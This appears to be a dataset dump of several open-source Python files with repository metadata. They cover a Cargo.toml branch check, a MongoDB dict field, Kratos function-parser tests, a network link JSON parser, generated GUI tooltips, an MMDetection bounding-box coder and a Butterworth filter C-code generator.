| column | type | values / range |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 4 to 1.02M |
| ext | string | 8 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 4 to 209 |
| max_stars_repo_name | string | length 5 to 121 |
| max_stars_repo_head_hexsha | string | length 40 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 | 1 to 191k (nullable) |
| max_stars_repo_stars_event_min_datetime | string | length 24 (nullable) |
| max_stars_repo_stars_event_max_datetime | string | length 24 (nullable) |
| max_issues_repo_path | string | length 4 to 209 |
| max_issues_repo_name | string | length 5 to 121 |
| max_issues_repo_head_hexsha | string | length 40 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64 | 1 to 67k (nullable) |
| max_issues_repo_issues_event_min_datetime | string | length 24 (nullable) |
| max_issues_repo_issues_event_max_datetime | string | length 24 (nullable) |
| max_forks_repo_path | string | length 4 to 209 |
| max_forks_repo_name | string | length 5 to 121 |
| max_forks_repo_head_hexsha | string | length 40 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64 | 1 to 105k (nullable) |
| max_forks_repo_forks_event_min_datetime | string | length 24 (nullable) |
| max_forks_repo_forks_event_max_datetime | string | length 24 (nullable) |
| content | string | length 4 to 1.02M |
| avg_line_length | float64 | 1.07 to 66.1k |
| max_line_length | int64 | 4 to 266k |
| alphanum_fraction | float64 | 0.01 to 1 |
hexsha: bed94396a482917e16322543e53b9186da1d4c36 | size: 931 | ext: py | lang: Python
max_stars: examples/enforce_branch.py | Deca-Technologies/cargo-parse @ 2263f55f40adc22f797fb7514818753e84dc5887 | ["MIT"] | count: 1 | 2021-12-10T18:22:57.000Z to 2021-12-10T18:22:57.000Z
max_issues: examples/enforce_branch.py | Deca-Technologies/cargo-parse @ 2263f55f40adc22f797fb7514818753e84dc5887 | ["MIT"] | count: null
max_forks: examples/enforce_branch.py | Deca-Technologies/cargo-parse @ 2263f55f40adc22f797fb7514818753e84dc5887 | ["MIT"] | count: null
content:
"""
Example script to demonstrate the usefulness of `cargo-parse`.
In this script, which could run as a GitHub Action, we assert that all Git
dependencies in `Cargo.toml` use a permitted branch (`main` or `master`). This
check could run whenever a PR targets the `master` branch.
"""
from pathlib import Path
from cargo_parse import parse_manifest_from_toml
from cargo_parse.models.dependency import GitDependency
PERMITTED_DEPENDENCY_BRANCHES = ["main", "master"]
if __name__ == "__main__":
manifest = parse_manifest_from_toml(Path("../tests/resources/Cargo.toml"))
for dependency in manifest.dependencies:
if isinstance(dependency, GitDependency):
assert (
dependency.branch in PERMITTED_DEPENDENCY_BRANCHES
), "Branch '{}' of `{}` not in {}".format(
dependency.branch,
dependency.name,
PERMITTED_DEPENDENCY_BRANCHES,
)
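# Hedged aside (not part of the example script): with a Git dependency pinned to, say, a
# `dev` branch, the assertion above fails with a message of the form:
#   AssertionError: Branch 'dev' of `some-crate` not in ['main', 'master']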
avg_line_length: 32.103448 | max_line_length: 78 | alphanum_fraction: 0.685285

hexsha: 03d1d0f1e56ce38b0df28a6d4f5b602f61b33052 | size: 470 | ext: py | lang: Python
max_stars: src/aiomongoengine/fields/dict_field.py | wangjiancn/aiomongoengine @ d73e576e0d564b6f741bbc00cadd5285e44d30f9 | ["MIT"] | count: 6 | 2020-02-09T03:13:20.000Z to 2021-05-25T07:03:16.000Z
max_issues: src/aiomongoengine/fields/dict_field.py | wangjiancn/aiomongoengine @ d73e576e0d564b6f741bbc00cadd5285e44d30f9 | ["MIT"] | count: null
max_forks: src/aiomongoengine/fields/dict_field.py | wangjiancn/aiomongoengine @ d73e576e0d564b6f741bbc00cadd5285e44d30f9 | ["MIT"] | count: null
content:
from .base_field import BaseField
class DictField(BaseField):
""" Field responsible for storing dict objects. """
def validate(self, value):
if not isinstance(value, dict):
self.error("StringField only accepts dict values.")
def is_empty(self, value) -> bool:
return value is None or value == {}
def to_son(self, value) -> dict:
if not isinstance(value, dict):
return dict(value)
return value
avg_line_length: 26.111111 | max_line_length: 63 | alphanum_fraction: 0.625532

hexsha: 00f402297c3b4da78b868c1d41419e2e9e489fa5 | size: 7,696 | ext: py | lang: Python
max_stars: kratos/tests/test_function_parser_utility.py | hbayraktaroglu/Kratos @ 6b71869ca7adb36a798e0cb11b34287fdc482590 | ["BSD-4-Clause"] | count: null
max_issues: kratos/tests/test_function_parser_utility.py | hbayraktaroglu/Kratos @ 6b71869ca7adb36a798e0cb11b34287fdc482590 | ["BSD-4-Clause"] | count: null
max_forks: kratos/tests/test_function_parser_utility.py | hbayraktaroglu/Kratos @ 6b71869ca7adb36a798e0cb11b34287fdc482590 | ["BSD-4-Clause"] | count: null
content:
import KratosMultiphysics.KratosUnittest as KratosUnittest
import KratosMultiphysics as KM
import math
import os
import sys
def GetFilePath(fileName):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), fileName)
class TestGenericFunctionUtility(KratosUnittest.TestCase):
def test_GenericFunctionUtility0(self):
settings = KM.Parameters("""
{
"local_axes" : {}
}
"""
)
current_model = KM.Model()
model_part= current_model.CreateModelPart("Main")
node = model_part.CreateNewNode(1, 1.00,0.00,0.00)
node.X += 0.1
current_time = model_part.ProcessInfo[KM.TIME]
aux_function = KM.GenericFunctionUtility("x", settings["local_axes"])
value = aux_function.CallFunction(node.X , node.Y , node.Z, current_time, node.X0, node.Y0, node.Z0)
self.assertEqual(value, 1.1)
aux_function = KM.GenericFunctionUtility("X", settings["local_axes"])
value = aux_function.CallFunction(node.X , node.Y , node.Z, current_time, node.X0, node.Y0, node.Z0)
self.assertEqual(value, 1.0)
aux_function = KM.GenericFunctionUtility("X+Y", settings["local_axes"])
value = aux_function.CallFunction(node.X , node.Y , node.Z, current_time, node.X0, node.Y0, node.Z0)
self.assertEqual(value, 1.0)
aux_function = KM.GenericFunctionUtility("x+X", settings["local_axes"])
value = aux_function.CallFunction(node.X , node.Y , node.Z, current_time, node.X0, node.Y0, node.Z0)
self.assertEqual(value, 2.1)
aux_function = KM.GenericFunctionUtility("t", settings["local_axes"])
value = aux_function.CallFunction(node.X , node.Y , node.Z, current_time, node.X0, node.Y0, node.Z0)
self.assertEqual(value, 0.0)
def test_GenericFunctionUtility1(self):
function1 = KM.GenericFunctionUtility("x**2+y**2")
self.assertTrue(function1.DependsOnSpace())
self.assertFalse(function1.UseLocalSystem())
self.assertEqual(function1.FunctionBody(), "x**2+y**2")
self.assertEqual(function1.CallFunction(4.0,3.0,0.0,0.0,0.0,0.0,0.0), 25)
function2 = KM.GenericFunctionUtility("3*t")
self.assertFalse(function2.DependsOnSpace())
self.assertFalse(function2.UseLocalSystem())
self.assertEqual(function2.FunctionBody(), "3*t")
self.assertEqual(function2.CallFunction(0.0,0.0,0.0,5.0,0.0,0.0,0.0), 15)
function3 = KM.GenericFunctionUtility("X**2+Y**2")
self.assertTrue(function3.DependsOnSpace())
self.assertFalse(function3.UseLocalSystem())
self.assertEqual(function3.FunctionBody(), "X**2+Y**2")
self.assertEqual(function3.CallFunction(0.0,0.0,0.0,0.0,4.0,3.0,0.0), 25)
function4 = KM.GenericFunctionUtility("(cos(x*pi)+sin(y*pi))*t")
self.assertTrue(function4.DependsOnSpace())
self.assertFalse(function4.UseLocalSystem())
self.assertEqual(function4.FunctionBody(), "(cos(x*pi)+sin(y*pi))*t")
self.assertEqual(function4.CallFunction(0.25,0.15,0.0,1.5,0.0,0.0,0.0), 1.5*(math.cos(0.25*math.pi) + math.sin(0.15*math.pi)))
def test_GenericFunctionUtility2(self):
parameters = KM.Parameters ("""{
"origin" : [0,0,0],
"axes" : [[0,1,0],[1,0,0],[0,0,1]]
}""")
function = KM.GenericFunctionUtility("x+2*y", parameters)
self.assertTrue(function.DependsOnSpace())
self.assertTrue(function.UseLocalSystem())
self.assertEqual(function.FunctionBody(), "x+2*y")
self.assertEqual(function.CallFunction(4.0,3.0,0.0,0.0,0.0,0.0,0.0), 10)
self.assertEqual(function.RotateAndCallFunction(4.0,3.0,0.0,0.0,0.0,0.0,0.0), 11)
def test_ApplyFunctionToNodesUtility(self):
parameters = KM.Parameters ("""{
"origin" : [0,0,0],
"axes" : [[0,1,0],[1,0,0],[0,0,1]]
}""")
function = KM.GenericFunctionUtility("x+2*y", parameters)
self.assertTrue(function.DependsOnSpace())
self.assertTrue(function.UseLocalSystem())
self.assertEqual(function.FunctionBody(), "x+2*y")
self.assertEqual(function.CallFunction(4.0,3.0,0.0,0.0,0.0,0.0,0.0), 10)
self.assertEqual(function.RotateAndCallFunction(4.0,3.0,0.0,0.0,0.0,0.0,0.0), 11)
this_model = KM.Model()
model_part = this_model.CreateModelPart("Main", 2)
current_process_info = model_part.ProcessInfo
current_process_info[KM.DOMAIN_SIZE] = 2
model_part.AddNodalSolutionStepVariable(KM.DISPLACEMENT)
model_part.AddNodalSolutionStepVariable(KM.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KM.VELOCITY)
model_part_io = KM.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
utility = KM.ApplyFunctionToNodesUtility(model_part.Nodes, function)
utility.ApplyFunction(KM.VISCOSITY, 1.0)
for node in model_part.Nodes:
self.assertEqual(node.GetSolutionStepValue(KM.VISCOSITY) - (node.Y + 2.0 * node.X), 0.0)
def test_ApplyFunctionToNodesUtilityTimeEvolutionTernary(self):
parameters = KM.Parameters ("""{}""")
function = KM.GenericFunctionUtility("1.5*(0.5*(1-cos(0.5*pi*t))*2.0)*(4.0/0.1681)*y*(0.41-y) if t<2.0 else 1.5*(2.0)*(4.0/0.1681)*y*(0.41-y)", parameters)
this_model = KM.Model()
model_part = this_model.CreateModelPart("Main", 2)
current_process_info = model_part.ProcessInfo
current_process_info[KM.DOMAIN_SIZE] = 2
model_part.AddNodalSolutionStepVariable(KM.DISPLACEMENT)
model_part.AddNodalSolutionStepVariable(KM.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KM.VELOCITY)
model_part_io = KM.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
current_process_info[KM.TIME] = 0.0
time = current_process_info[KM.TIME]
while time < 3.0:
current_process_info[KM.TIME] = current_process_info[KM.TIME] + 1.0
time = current_process_info[KM.TIME]
utility = KM.ApplyFunctionToNodesUtility(model_part.Nodes, function)
utility.ApplyFunction(KM.VISCOSITY, time)
if time < 2.0:
for node in model_part.Nodes:
self.assertEqual(node.GetSolutionStepValue(KM.VISCOSITY) - (1.5*(0.5*(1-math.cos(0.5*math.pi*time))*2.0)*(4.0/0.1681)*node.Y*(0.41-node.Y)), 0.0)
else:
for node in model_part.Nodes:
self.assertAlmostEqual(node.GetSolutionStepValue(KM.VISCOSITY), 1.5*(2.0)*(4.0/0.1681)*node.Y*(0.41-node.Y))
def test_ApplyFunctionToNodesUtilityTimeEvolutionCTernaryFail(self):
parameters = KM.Parameters ("""{
"origin" : [0,0,0],
"axes" : [[0,1,0],[1,0,0],[0,0,1]]
}""")
with self.assertRaisesRegex(Exception, 'Parsing error in function: 1.5 if t<2.0 3.0 if defined, but not else'):
KM.GenericFunctionUtility("1.5 if t<2.0 3.0", parameters)
def test_GenericFunctionUtilityError(self):
with self.assertRaisesRegex(Exception, 'Parsing error in function: \(0\)\*\(50\*\(expp\(t\)-1\)\)\nError occurred near here : \^ \(char \[12\]\)\nCheck your locale \(e.g. if "." or "," is used as decimal point'):
KM.GenericFunctionUtility("(0)*(50*(expp(t)-1))")
if __name__ == '__main__':
KM.Logger.GetDefaultOutput().SetSeverity(KM.Logger.Severity.WARNING)
KratosUnittest.main()
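# Hedged aside (not part of the test file): in the parsed function strings, lower-case
# x, y, z and t are the current coordinates and time passed to CallFunction, while
# upper-case X, Y, Z are the initial coordinates, which is why "x" evaluates to 1.1 and
# "X" to 1.0 in test_GenericFunctionUtility0 after the node is moved by 0.1.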
avg_line_length: 42.755556 | max_line_length: 232 | alphanum_fraction: 0.652547

hexsha: 7deef52697006affcb92053ef90382c42d0f4898 | size: 1,923 | ext: py | lang: Python
max_stars: sdxdatamodel/parsing/linkhandler.py | atlanticwave-sdx/datamodel @ f0ca36d45525b37b25357842744b0c300e9246b4 | ["MIT"] | count: null
max_issues: sdxdatamodel/parsing/linkhandler.py | atlanticwave-sdx/datamodel @ f0ca36d45525b37b25357842744b0c300e9246b4 | ["MIT"] | count: 6 | 2021-07-20T16:15:48.000Z to 2021-10-14T13:51:46.000Z
max_forks: sdxdatamodel/parsing/linkhandler.py | atlanticwave-sdx/datamodel @ f0ca36d45525b37b25357842744b0c300e9246b4 | ["MIT"] | count: null
content:
import json
from sdxdatamodel.models.link import Link
from .exceptions import MissingAttributeException
class LinkHandler():
""""
Handler for parsing the connection request descritpion in json
"""
def __init__(self):
super().__init__()
self.link = None
def import_link_data(self, data):
try:
id = data['id']
name=data['name']
short_name=data['short_name']
ports=data['ports']
timestamp=None;t_b=None;a_b=None;latency=None;p_l=None;p_a=None;avai=None;m_p=None
if 'time_stamp' in data.keys():
timestamp=data['time_stamp']
if 'total_bandwidth' in data.keys():
t_b=data['total_bandwidth']
if 'available_bandwidth' in data.keys():
a_b=data['available_bandwidth']
if 'latency' in data.keys():
latency=data['latency']
if 'packet_loss' in data.keys():
p_l=data['packet_loss']
if 'private_attributes' in data.keys():
p_a=data['private_attributes']
if 'availability' in data.keys():
avai=data['availability']
if 'measurement_period' in data.keys():
m_p=data['measurement_period']
except KeyError as e:
raise MissingAttributeException(e.args[0],e.args[0])
link=Link(id=id, name=name, short_name=short_name, ports=ports, total_bandwidth=t_b, available_bandwidth=a_b,
latency=latency, packet_loss=p_l, availability=avai, private_attributes=p_a, time_stamp=timestamp, measurement_period=m_p)
return link
def import_link(self,file):
with open(file, 'r', encoding='utf-8') as data_file:
data = json.load(data_file)
self.link = self.import_link_data(data)
def get_link(self):
return self.link
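# Hedged usage sketch (not part of the original module): exercising LinkHandler on a JSON
# file shaped like the attributes read in import_link_data above. The file name and the
# field values are hypothetical.
#   my_link.json: {"id": "urn:sdx:link:1", "name": "link-1", "short_name": "l1", "ports": [], "latency": 2}
handler = LinkHandler()
handler.import_link("my_link.json")
print(handler.get_link())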
avg_line_length: 35.611111 | max_line_length: 134 | alphanum_fraction: 0.592304

hexsha: 58c448a8a36ff18c978dead8021d0bd8df14ada2 | size: 3,172 | ext: py | lang: Python
max_stars: pyleecan/GUI/Dialog/DMachineSetup/SMHoleMag/PHoleM53/Gen_PHoleM53.py | helene-t/pyleecan @ 8362de9b0e32b346051b38192e07f3a6974ea9aa | ["Apache-2.0"] | count: 1 | 2021-02-26T12:28:45.000Z to 2021-02-26T12:28:45.000Z
max_issues: GUI/Dialog/DMachineSetup/SMHoleMag/PHoleM53/Gen_PHoleM53.py | magnetron/pyleecan @ 2a3338f4ab080ad6488b5ab8746c3fea1f36f177 | ["Apache-2.0"] | count: null
max_forks: GUI/Dialog/DMachineSetup/SMHoleMag/PHoleM53/Gen_PHoleM53.py | magnetron/pyleecan @ 2a3338f4ab080ad6488b5ab8746c3fea1f36f177 | ["Apache-2.0"] | count: null
content:
# -*- coding: utf-8 -*-
"""File generated according to PHoleM53/gen_list.json
WARNING! All changes made in this file will be lost!
"""
from pyleecan.GUI.Dialog.DMachineSetup.SMHoleMag.PHoleM53.Ui_PHoleM53 import Ui_PHoleM53
class Gen_PHoleM53(Ui_PHoleM53):
def setupUi(self, PHoleM53):
"""Abstract class to update the widget according to the csv doc
"""
Ui_PHoleM53.setupUi(self, PHoleM53)
# Setup of in_W1
txt = self.tr(u"""Tooth width (at V bottom)""")
self.in_W1.setWhatsThis(txt)
self.in_W1.setToolTip(txt)
# Setup of lf_W1
self.lf_W1.validator().setBottom(0)
txt = self.tr(u"""Tooth width (at V bottom)""")
self.lf_W1.setWhatsThis(txt)
self.lf_W1.setToolTip(txt)
# Setup of in_W2
txt = self.tr(u"""Distance Magnet to bottom of the V""")
self.in_W2.setWhatsThis(txt)
self.in_W2.setToolTip(txt)
# Setup of lf_W2
self.lf_W2.validator().setBottom(0)
txt = self.tr(u"""Distance Magnet to bottom of the V""")
self.lf_W2.setWhatsThis(txt)
self.lf_W2.setToolTip(txt)
# Setup of in_W3
txt = self.tr(u"""Magnet Width""")
self.in_W3.setWhatsThis(txt)
self.in_W3.setToolTip(txt)
# Setup of lf_W3
self.lf_W3.validator().setBottom(0)
txt = self.tr(u"""Magnet Width""")
self.lf_W3.setWhatsThis(txt)
self.lf_W3.setToolTip(txt)
# Setup of in_W4
txt = self.tr(u"""Slot angle""")
self.in_W4.setWhatsThis(txt)
self.in_W4.setToolTip(txt)
# Setup of lf_W4
self.lf_W4.validator().setBottom(0)
txt = self.tr(u"""Slot angle""")
self.lf_W4.setWhatsThis(txt)
self.lf_W4.setToolTip(txt)
# Setup of in_H0
txt = self.tr(u"""Slot depth""")
self.in_H0.setWhatsThis(txt)
self.in_H0.setToolTip(txt)
# Setup of lf_H0
self.lf_H0.validator().setBottom(0)
txt = self.tr(u"""Slot depth""")
self.lf_H0.setWhatsThis(txt)
self.lf_H0.setToolTip(txt)
# Setup of in_H1
txt = self.tr(u"""Distance from the lamination Bore""")
self.in_H1.setWhatsThis(txt)
self.in_H1.setToolTip(txt)
# Setup of lf_H1
self.lf_H1.validator().setBottom(0)
txt = self.tr(u"""Distance from the lamination Bore""")
self.lf_H1.setWhatsThis(txt)
self.lf_H1.setToolTip(txt)
# Setup of in_H2
txt = self.tr(u"""Magnet Height""")
self.in_H2.setWhatsThis(txt)
self.in_H2.setToolTip(txt)
# Setup of lf_H2
self.lf_H2.validator().setBottom(0)
txt = self.tr(u"""Magnet Height""")
self.lf_H2.setWhatsThis(txt)
self.lf_H2.setToolTip(txt)
# Setup of in_H3
txt = self.tr(u"""Additional depth for the magnet""")
self.in_H3.setWhatsThis(txt)
self.in_H3.setToolTip(txt)
# Setup of lf_H3
self.lf_H3.validator().setBottom(0)
txt = self.tr(u"""Additional depth for the magnet""")
self.lf_H3.setWhatsThis(txt)
self.lf_H3.setToolTip(txt)
avg_line_length: 31.405941 | max_line_length: 88 | alphanum_fraction: 0.600252

hexsha: cb942f6553951b93431cc830d90d85bc87e96cfd | size: 7,449 | ext: py | lang: Python
max_stars: mmdet/core/bbox/coder/legacy_delta_xywh_bbox_coder.py | fengyouliang/wheat_detection @ d056123426a1260c29b486cbb8e44a88a0a3c5bc | ["Apache-2.0"] | count: null
max_issues: mmdet/core/bbox/coder/legacy_delta_xywh_bbox_coder.py | fengyouliang/wheat_detection @ d056123426a1260c29b486cbb8e44a88a0a3c5bc | ["Apache-2.0"] | count: null
max_forks: mmdet/core/bbox/coder/legacy_delta_xywh_bbox_coder.py | fengyouliang/wheat_detection @ d056123426a1260c29b486cbb8e44a88a0a3c5bc | ["Apache-2.0"] | count: null
content:
import numpy as np
import torch
from ..builder import BBOX_CODERS
from .base_bbox_coder import BaseBBoxCoder
@BBOX_CODERS.register_module()
class LegacyDeltaXYWHBBoxCoder(BaseBBoxCoder):
"""Legacy Delta XYWH BBox coder used in MMDet V1.x
Following the practice in R-CNN [1]_, this coder encodes bbox (x1, y1, x2,
y2) into delta (dx, dy, dw, dh) and decodes delta (dx, dy, dw, dh)
back to original bbox (x1, y1, x2, y2).
Note:
The main difference between `LegacyDeltaXYWHBBoxCoder` and
`DeltaXYWHBBoxCoder` is whether ``+ 1`` is used during width and height
calculation. We suggest using this coder only when testing with
MMDet V1.x models.
References:
.. [1] https://arxiv.org/abs/1311.2524
Args:
target_means (Sequence[float]): denormalizing means of target for
delta coordinates
target_stds (Sequence[float]): denormalizing standard deviation of
target for delta coordinates
"""
def __init__(self,
target_means=(0., 0., 0., 0.),
target_stds=(1., 1., 1., 1.)):
super(BaseBBoxCoder, self).__init__()
self.means = target_means
self.stds = target_stds
def encode(self, bboxes, gt_bboxes):
assert bboxes.size(0) == gt_bboxes.size(0)
assert bboxes.size(-1) == gt_bboxes.size(-1) == 4
encoded_bboxes = legacy_bbox2delta(bboxes, gt_bboxes, self.means,
self.stds)
return encoded_bboxes
def decode(self,
bboxes,
pred_bboxes,
max_shape=None,
wh_ratio_clip=16 / 1000):
assert pred_bboxes.size(0) == bboxes.size(0)
decoded_bboxes = legacy_delta2bbox(bboxes, pred_bboxes, self.means,
self.stds, max_shape, wh_ratio_clip)
return decoded_bboxes
def legacy_bbox2delta(proposals,
gt,
means=(0., 0., 0., 0.),
stds=(1., 1., 1., 1.)):
"""Compute deltas of proposals w.r.t. gt in the MMDet V1.x manner.
We usually compute the deltas of x, y, w, h of proposals w.r.t ground
truth bboxes to get regression target.
This is the inverse function of `delta2bbox()`
Args:
proposals (Tensor): Boxes to be transformed, shape (N, ..., 4)
gt (Tensor): Gt bboxes to be used as base, shape (N, ..., 4)
means (Sequence[float]): Denormalizing means for delta coordinates
stds (Sequence[float]): Denormalizing standard deviation for delta
coordinates
Returns:
Tensor: deltas with shape (N, 4), where columns represent dx, dy,
dw, dh.
"""
assert proposals.size() == gt.size()
proposals = proposals.float()
gt = gt.float()
px = (proposals[..., 0] + proposals[..., 2]) * 0.5
py = (proposals[..., 1] + proposals[..., 3]) * 0.5
pw = proposals[..., 2] - proposals[..., 0] + 1.0
ph = proposals[..., 3] - proposals[..., 1] + 1.0
gx = (gt[..., 0] + gt[..., 2]) * 0.5
gy = (gt[..., 1] + gt[..., 3]) * 0.5
gw = gt[..., 2] - gt[..., 0] + 1.0
gh = gt[..., 3] - gt[..., 1] + 1.0
dx = (gx - px) / pw
dy = (gy - py) / ph
dw = torch.log(gw / pw)
dh = torch.log(gh / ph)
deltas = torch.stack([dx, dy, dw, dh], dim=-1)
means = deltas.new_tensor(means).unsqueeze(0)
stds = deltas.new_tensor(stds).unsqueeze(0)
deltas = deltas.sub_(means).div_(stds)
return deltas
def legacy_delta2bbox(rois,
deltas,
means=(0., 0., 0., 0.),
stds=(1., 1., 1., 1.),
max_shape=None,
wh_ratio_clip=16 / 1000):
"""Apply deltas to shift/scale base boxes in the MMDet V1.x manner.
Typically the rois are anchor or proposed bounding boxes and the deltas are
network outputs used to shift/scale those boxes.
This is the inverse function of `bbox2delta()`
Args:
rois (Tensor): Boxes to be transformed. Has shape (N, 4)
deltas (Tensor): Encoded offsets with respect to each roi.
Has shape (N, 4 * num_classes). Note N = num_anchors * W * H when
rois is a grid of anchors. Offset encoding follows [1]_.
means (Sequence[float]): Denormalizing means for delta coordinates
stds (Sequence[float]): Denormalizing standard deviation for delta
coordinates
max_shape (tuple[int, int]): Maximum bounds for boxes. specifies (H, W)
wh_ratio_clip (float): Maximum aspect ratio for boxes.
Returns:
Tensor: Boxes with shape (N, 4), where columns represent
tl_x, tl_y, br_x, br_y.
References:
.. [1] https://arxiv.org/abs/1311.2524
Example:
>>> rois = torch.Tensor([[ 0., 0., 1., 1.],
>>> [ 0., 0., 1., 1.],
>>> [ 0., 0., 1., 1.],
>>> [ 5., 5., 5., 5.]])
>>> deltas = torch.Tensor([[ 0., 0., 0., 0.],
>>> [ 1., 1., 1., 1.],
>>> [ 0., 0., 2., -1.],
>>> [ 0.7, -1.9, -0.5, 0.3]])
>>> legacy_delta2bbox(rois, deltas, max_shape=(32, 32))
tensor([[0.0000, 0.0000, 1.5000, 1.5000],
[0.0000, 0.0000, 5.2183, 5.2183],
[0.0000, 0.1321, 7.8891, 0.8679],
[5.3967, 2.4251, 6.0033, 3.7749]])
"""
means = deltas.new_tensor(means).repeat(1, deltas.size(1) // 4)
stds = deltas.new_tensor(stds).repeat(1, deltas.size(1) // 4)
denorm_deltas = deltas * stds + means
dx = denorm_deltas[:, 0::4]
dy = denorm_deltas[:, 1::4]
dw = denorm_deltas[:, 2::4]
dh = denorm_deltas[:, 3::4]
max_ratio = np.abs(np.log(wh_ratio_clip))
dw = dw.clamp(min=-max_ratio, max=max_ratio)
dh = dh.clamp(min=-max_ratio, max=max_ratio)
# Compute center of each roi
px = ((rois[:, 0] + rois[:, 2]) * 0.5).unsqueeze(1).expand_as(dx)
py = ((rois[:, 1] + rois[:, 3]) * 0.5).unsqueeze(1).expand_as(dy)
# Compute width/height of each roi
pw = (rois[:, 2] - rois[:, 0] + 1.0).unsqueeze(1).expand_as(dw)
ph = (rois[:, 3] - rois[:, 1] + 1.0).unsqueeze(1).expand_as(dh)
# Use exp(network energy) to enlarge/shrink each roi
gw = pw * dw.exp()
gh = ph * dh.exp()
# Use network energy to shift the center of each roi
gx = px + pw * dx
gy = py + ph * dy
# Convert center-xy/width/height to top-left, bottom-right
# The true legacy box coder should +- 0.5 here.
# However, current implementation improves the performance when testing
# the models trained in MMDetection 1.X (~0.5 bbox AP, 0.2 mask AP)
x1 = gx - gw * 0.5
y1 = gy - gh * 0.5
x2 = gx + gw * 0.5
y2 = gy + gh * 0.5
if max_shape is not None:
x1 = x1.clamp(min=0, max=max_shape[1] - 1)
y1 = y1.clamp(min=0, max=max_shape[0] - 1)
x2 = x2.clamp(min=0, max=max_shape[1] - 1)
y2 = y2.clamp(min=0, max=max_shape[0] - 1)
bboxes = torch.stack([x1, y1, x2, y2], dim=-1).view_as(deltas)
return bboxes
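# Hedged sketch (not part of the original file): a quick numeric round trip through the
# legacy encode/decode pair defined above. Decoding the encoded deltas returns the ground
# truth box widened by 0.5 px on each side, which is the "+/- 0.5" caveat noted in the
# comments of legacy_delta2bbox.
if __name__ == '__main__':
    proposals = torch.tensor([[0., 0., 10., 10.]])
    gt = torch.tensor([[1., 1., 11., 13.]])
    deltas = legacy_bbox2delta(proposals, gt)
    print(deltas)                                # tensor([[0.0909, 0.1818, 0.0000, 0.1671]])
    print(legacy_delta2bbox(proposals, deltas))  # tensor([[ 0.5000,  0.5000, 11.5000, 13.5000]])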
avg_line_length: 39.205263 | max_line_length: 80 | alphanum_fraction: 0.534703

hexsha: c7759dca474e5d1aeb4740ecd875244a1cbfc513 | size: 3,476 | ext: py | lang: Python
max_stars: filter.py | navin-bhaskar/GuitarTuner_EdisonGalileo @ 20e31da5f1b395e8405a19f670644b4a2d909ecd | ["BSD-2-Clause"] | count: null
max_issues: filter.py | navin-bhaskar/GuitarTuner_EdisonGalileo @ 20e31da5f1b395e8405a19f670644b4a2d909ecd | ["BSD-2-Clause"] | count: null
max_forks: filter.py | navin-bhaskar/GuitarTuner_EdisonGalileo @ 20e31da5f1b395e8405a19f670644b4a2d909ecd | ["BSD-2-Clause"] | count: 1 | 2020-03-17T05:54:20.000Z to 2020-03-17T05:54:20.000Z
content:
#!/usr/bin/env python
from scipy import signal
"""
This script generates the C function template for a given cutoff
frequency. Note that this script uses a Butterworth filter design to
generate the difference equations.
"""
# Define your filter parameters here
Fs = 44100 # Sampling frequency in Hz
Fc = 8000 # Cut-off frequency in Hz, set to 8k here
order = 2 # Design a second order filter
outFile = "filter" # The output file to be created, without any extension.
#This script will create .c and accompanying .h file for you to use
nyquistRate = Fs/2.0
Wc = Fc/nyquistRate # Cutoff frequency normalized to the Nyquist rate (pi rad/sample)
# Get the filter coefficients for Wc as a low-pass filter using the Butterworth design
[b, a] = signal.butter(order, Wc, 'low')
output= """
/**
* THIS IS AN AUTOMATICALLY GENERATED FILE.
* Implements the difference equation given the input signal.
* The a and b of the DE are defined here locally. Which means that
* you will have to regenerate this file every time the sampling or
* the cut off frequency changes.
*/
static float a[] = {
"""
outText = ""
nPos = 0
inFloat = a.astype(float)
for num in inFloat:
outText = outText + "%+ff, " %num
output = output + outText
output = output + "\n};"
output = output + "\n\nstatic float b[] = { \n"
outText = ""
inFloat = b.astype(float)
for num in inFloat:
outText = outText + "%+ff, " %num
output = output + outText
output = output + "\n};"
functionImp = """
/**
* This function filters the signal.
* This function also takes care of the initial conditions
*/
void iirDirect2(
float *x, /**< Input signal */
float *y, /**< Output signal */
int n /**< Length of the input samples */
)
{
int i;
"""
# Handle the initial condition
initialCond = ""
eq = ""
for i in range(0, order):
eq = eq + " y[%d] = " %(i)
for j in range(0, len(b)):
if i-j < 0:
eq = eq + "b[%d] * 0 " %(j) # Take care of negative indices
else:
eq = eq + "b[%d] * x[%d]" %(j, i-j)
eq = eq + " + "
eq = eq[0:len(eq)-2] # Get rid of extra '+'
eq = eq + " - "
for j in range(1, len(a)): # Ignore the unit gain of the coefficients generated
if i-j < 0:
eq = eq + "(a[%d] * 0) " %(j) # Take care of negative indices
else:
eq = eq + "(a[%d] * y[%d])" %(j, i-j)
eq = eq + " - "
eq = eq[0:len(eq)-2] # Get rid of extra '-'
eq = eq + ";\n"
functionImp = functionImp + eq
# Now for the rest of the equation
theForloop = """
for (i=%d; i<n; i++)
{
"""
eq = " y[i] = "
for j in range(0, len(b)):
eq = eq + "b[%d] * x[i-%d]" %(j, j)
eq = eq + " + "
eq = eq[0:len(eq)-2] # Get rid of extra '+'
eq = eq + " - "
for j in range(1, len(a)):
eq = eq + "(a[%d] * y[i-%d])" %(j, j)
eq = eq + " - "
eq = eq[0:len(eq)-2] # Get rid of extra '-'
eq = eq + ";\n"
theForloop = theForloop %(order)
theForloop = theForloop + eq + "\n }\n}"
functionImp = functionImp + theForloop
output = output + functionImp
#print output
# create the header file first
headerContent = """
#ifndef __FILTER_H
#define __FILTER_H
void iirDirect2(float *, float *, int);
#endif
"""
f = file(outFile+".h", "w")
f.write(headerContent)
f.close()
f = file(outFile+".c", "w")
f.write(output)
f.close()
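# Hedged aside (not part of the original script): the generated C routine implements the
# same direct-form difference equation as scipy.signal.lfilter, so its output can be
# cross-checked against a Python reference computed from the identical b and a.
import numpy as np
x_test = np.random.randn(1024)         # arbitrary test signal
y_ref = signal.lfilter(b, a, x_test)   # reference output iirDirect2() should reproduce
print("reference output computed for %d samples" % len(y_ref))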
